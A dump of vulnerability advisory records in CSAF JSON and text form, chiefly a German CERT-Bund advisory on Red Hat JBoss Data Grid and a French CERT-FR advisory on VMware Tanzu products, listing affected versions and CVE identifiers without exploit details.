"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2024-45296",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-45296"
},
{
"cve": "CVE-2024-45590",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-45590"
},
{
"cve": "CVE-2024-48948",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-48948"
},
{
"cve": "CVE-2024-48949",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-48949"
},
{
"cve": "CVE-2024-52798",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-52798"
},
{
"cve": "CVE-2024-55565",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-55565"
},
{
"cve": "CVE-2024-45801",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-45801"
},
{
"cve": "CVE-2024-42459",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-42459"
},
{
"cve": "CVE-2024-42460",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-42460"
},
{
"cve": "CVE-2024-42461",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-42461"
},
{
"cve": "CVE-2024-47764",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-47764"
}
]
}
WID-SEC-W-2024-3544
Vulnerability from csaf_certbund - Published: 2024-11-25 23:00 - Updated: 2025-11-17 23:00Summary
Red Hat JBoss Data Grid: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat JBoss Data Grid ist eine verteilte In-Memory-Datenbank für den schnellen Zugriff auf große Datenvolumen und Skalierbarkeit.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat JBoss Data Grid ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen und um einen Denial-of-Service-Zustand zu erzeugen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat JBoss Data Grid ist eine verteilte In-Memory-Datenbank f\u00fcr den schnellen Zugriff auf gro\u00dfe Datenvolumen und Skalierbarkeit.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat JBoss Data Grid ausnutzen, um einen Cross-Site Scripting Angriff durchzuf\u00fchren und um einen Denial-of-Service-Zustand zu erzeugen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-3544 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3544.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-3544 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3544"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10214 vom 2024-11-25",
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2024-2707 vom 2024-12-20",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2024-2707.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4001 vom 2024-12-21",
"url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00023.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7233394 vom 2025-05-14",
"url": "https://www.ibm.com/support/pages/node/7233394"
},
{
"category": "external",
"summary": "SolarWinds Platform 2025.4.1 release notes vom 2025-11-18",
"url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2025-4-1_release_notes.htm"
}
],
"source_lang": "en-US",
"title": "Red Hat JBoss Data Grid: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-11-17T23:00:00.000+00:00",
"generator": {
"date": "2025-11-18T08:17:39.050+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2024-3544",
"initial_release_date": "2024-11-25T23:00:00.000+00:00",
"revision_history": [
{
"date": "2024-11-25T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-12-19T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2024-12-22T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2025-05-14T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-11-17T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates aufgenommen"
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Amazon Linux 2",
"product": {
"name": "Amazon Linux 2",
"product_id": "398363",
"product_identification_helper": {
"cpe": "cpe:/o:amazon:linux_2:-"
}
}
}
],
"category": "vendor",
"name": "Amazon"
},
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c7.5.0 UP12",
"product": {
"name": "IBM QRadar SIEM \u003c7.5.0 UP12",
"product_id": "T043784"
}
},
{
"category": "product_version",
"name": "7.5.0 UP12",
"product": {
"name": "IBM QRadar SIEM 7.5.0 UP12",
"product_id": "T043784-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:7.5.0_up12"
}
}
}
],
"category": "product_name",
"name": "QRadar SIEM"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c8.5.2",
"product": {
"name": "Red Hat JBoss Data Grid \u003c8.5.2",
"product_id": "T039428"
}
},
{
"category": "product_version",
"name": "8.5.2",
"product": {
"name": "Red Hat JBoss Data Grid 8.5.2",
"product_id": "T039428-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_data_grid:8.5.2"
}
}
}
],
"category": "product_name",
"name": "JBoss Data Grid"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c2025.4.1",
"product": {
"name": "SolarWinds Platform \u003c2025.4.1",
"product_id": "T048650"
}
},
{
"category": "product_version",
"name": "2025.4.1",
"product": {
"name": "SolarWinds Platform 2025.4.1",
"product_id": "T048650-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:solarwinds:orion_platform:2025.4.1"
}
}
}
],
"category": "product_name",
"name": "Platform"
}
],
"category": "vendor",
"name": "SolarWinds"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"product_status": {
"known_affected": [
"T043784",
"2951",
"T039428",
"398363",
"T048650"
]
},
"release_date": "2024-11-25T23:00:00.000+00:00",
"title": "CVE-2024-43788"
},
{
"cve": "CVE-2024-47072",
"product_status": {
"known_affected": [
"T043784",
"2951",
"T039428",
"398363",
"T048650"
]
},
"release_date": "2024-11-25T23:00:00.000+00:00",
"title": "CVE-2024-47072"
}
]
}
CERTFR-2025-AVI-0969
Vulnerability from certfr_avis - Published: 2025-11-06 - Updated: 2025-11-06
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Kubernetes Runtime | GenAI sur Tanzu Platform pour Cloud Foundry versions antérieures à 10.2.5 | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.90.x | ||
| VMware | Tanzu Kubernetes Runtime | NodeJS Buildpack versions antérieures à 1.8.58 | ||
| VMware | Tanzu Kubernetes Runtime | Python Buildpack versions antérieures à 1.8.63 | ||
| VMware | Tanzu Kubernetes Runtime | VMware Tanzu pour MySQL sur Tanzu Platform versions antérieures à 10.1.0 | ||
| VMware | Tanzu Kubernetes Runtime | API Gateway pour VMware Tanzu Platform versions antérieures à 2.4.0 | ||
| VMware | Tanzu Kubernetes Runtime | PHP Buildpack versions antérieures à 4.6.49 | ||
| VMware | Tanzu Kubernetes Runtime | Single Sign-On pour VMware Tanzu Platform versions antérieures à 1.16.14 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy FIPS) versions antérieures à 1.915.x | ||
| VMware | Tanzu Application Service | CredHub Service Broker versions antérieures à 1.6.6 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy FIPS) versions antérieures à 1.943.x | ||
| VMware | Tanzu Kubernetes Runtime | Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions antérieures à 10.2.4+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry Windows versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.915.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry Windows versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Single Sign-On pour VMware Tanzu Application Service versions antérieures à 1.16.13 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.943.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry isolation segment versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.77.x | ||
| VMware | Services Suite | Platform Automation Toolkit versions antérieures à 5.3.2 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy Azure Light) versions antérieures à 1.906.x | ||
| VMware | Tanzu Kubernetes Runtime | Spring Cloud Data Flow pour VMware Tanzu versions antérieures à 1.14.9 | ||
| VMware | Tanzu Kubernetes Runtime | App Autoscaler CLI Plugin pour VMware Tanzu Platform versions antérieures à 250.5.9 | ||
| VMware | Tanzu Kubernetes Runtime | Spring Cloud Services pour VMware Tanzu versions antérieures à 3.3.10 | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Concourse pour VMware Tanzu versions antérieures à 7.14.1+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry isolation segment versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Platform Services pour VMware Tanzu Platform versions antérieures à 10.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Ruby Buildpack versions antérieures à 1.10.46 | ||
| VMware | Tanzu Kubernetes Runtime | Elastic Application Runtime pour VMware Tanzu Platform versions antérieures à 6.0.21+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Telemetry pour VMware Tanzu Platform versions antérieures à 2.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.103.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Hub versions antérieures à 10.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.906.x |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "GenAI sur Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 10.2.5",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.90.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "NodeJS Buildpack versions ant\u00e9rieures \u00e0 1.8.58",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Python Buildpack versions ant\u00e9rieures \u00e0 1.8.63",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu pour MySQL sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.1.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "API Gateway pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.4.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "PHP Buildpack versions ant\u00e9rieures \u00e0 4.6.49",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Single Sign-On pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.16.14",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy FIPS) versions ant\u00e9rieures \u00e0 1.915.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "CredHub Service Broker versions ant\u00e9rieures \u00e0 1.6.6",
"product": {
"name": "Tanzu Application Service",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy FIPS) versions ant\u00e9rieures \u00e0 1.943.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry Windows versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.915.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry Windows versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Single Sign-On pour VMware Tanzu Application Service versions ant\u00e9rieures \u00e0 1.16.13",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.943.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry isolation segment versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.77.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Platform Automation Toolkit versions ant\u00e9rieures \u00e0 5.3.2",
"product": {
"name": "Services Suite",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy Azure Light) versions ant\u00e9rieures \u00e0 1.906.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Spring Cloud Data Flow pour VMware Tanzu versions ant\u00e9rieures \u00e0 1.14.9",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "App Autoscaler CLI Plugin pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 250.5.9",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Spring Cloud Services pour VMware Tanzu versions ant\u00e9rieures \u00e0 3.3.10",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Concourse pour VMware Tanzu versions ant\u00e9rieures \u00e0 7.14.1+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry isolation segment versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Platform Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Ruby Buildpack versions ant\u00e9rieures \u00e0 1.10.46",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.21+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Telemetry pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.103.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Hub versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.906.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2019-25013",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-25013"
},
{
"name": "CVE-2017-9937",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9937"
},
{
"name": "CVE-2025-6395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6395"
},
{
"name": "CVE-2022-1343",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1343"
},
{
"name": "CVE-2013-4235",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-4235"
},
{
"name": "CVE-2024-37370",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37370"
},
{
"name": "CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"name": "CVE-2024-57981",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57981"
},
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2017-3613",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3613"
},
{
"name": "CVE-2025-30681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30681"
},
{
"name": "CVE-2022-25308",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25308"
},
{
"name": "CVE-2021-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3996"
},
{
"name": "CVE-2024-38807",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38807"
},
{
"name": "CVE-2023-0216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0216"
},
{
"name": "CVE-2023-27102",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27102"
},
{
"name": "CVE-2022-43236",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43236"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2023-7104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7104"
},
{
"name": "CVE-2022-35252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35252"
},
{
"name": "CVE-2005-0602",
"url": "https://www.cve.org/CVERecord?id=CVE-2005-0602"
},
{
"name": "CVE-2017-6834",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6834"
},
{
"name": "CVE-2025-22003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22003"
},
{
"name": "CVE-2022-1473",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1473"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2023-3428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3428"
},
{
"name": "CVE-2021-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3933"
},
{
"name": "CVE-2022-32189",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32189"
},
{
"name": "CVE-2022-43237",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43237"
},
{
"name": "CVE-2021-23215",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23215"
},
{
"name": "CVE-2022-1115",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1115"
},
{
"name": "CVE-2024-57994",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57994"
},
{
"name": "CVE-2025-21798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21798"
},
{
"name": "CVE-2025-3264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3264"
},
{
"name": "CVE-2015-4789",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4789"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2020-14621",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14621"
},
{
"name": "CVE-2025-26465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26465"
},
{
"name": "CVE-2025-21975",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21975"
},
{
"name": "CVE-2025-21980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21980"
},
{
"name": "CVE-2023-0401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0401"
},
{
"name": "CVE-2025-21889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21889"
},
{
"name": "CVE-2025-21861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21861"
},
{
"name": "CVE-2025-38328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38328"
},
{
"name": "CVE-2025-31115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31115"
},
{
"name": "CVE-2021-33294",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33294"
},
{
"name": "CVE-2023-3195",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3195"
},
{
"name": "CVE-2025-59830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59830"
},
{
"name": "CVE-2023-21843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21843"
},
{
"name": "CVE-2021-20243",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20243"
},
{
"name": "CVE-2023-3316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3316"
},
{
"name": "CVE-2023-1175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1175"
},
{
"name": "CVE-2024-57948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57948"
},
{
"name": "CVE-2025-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21937"
},
{
"name": "CVE-2014-9157",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9157"
},
{
"name": "CVE-2020-2803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2803"
},
{
"name": "CVE-2020-14803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14803"
},
{
"name": "CVE-2024-58088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58088"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-53042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53042"
},
{
"name": "CVE-2024-9681",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
},
{
"name": "CVE-2021-37600",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37600"
},
{
"name": "CVE-2025-21689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21689"
},
{
"name": "CVE-2025-21682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21682"
},
{
"name": "CVE-2011-3374",
"url": "https://www.cve.org/CVERecord?id=CVE-2011-3374"
},
{
"name": "CVE-2025-30689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30689"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2021-26260",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26260"
},
{
"name": "CVE-2023-0922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0922"
},
{
"name": "CVE-2025-38100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38100"
},
{
"name": "CVE-2017-18250",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18250"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2025-1372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1372"
},
{
"name": "CVE-2025-40002",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40002"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2025-8851",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8851"
},
{
"name": "CVE-2024-58010",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58010"
},
{
"name": "CVE-2025-38043",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38043"
},
{
"name": "CVE-2025-21697",
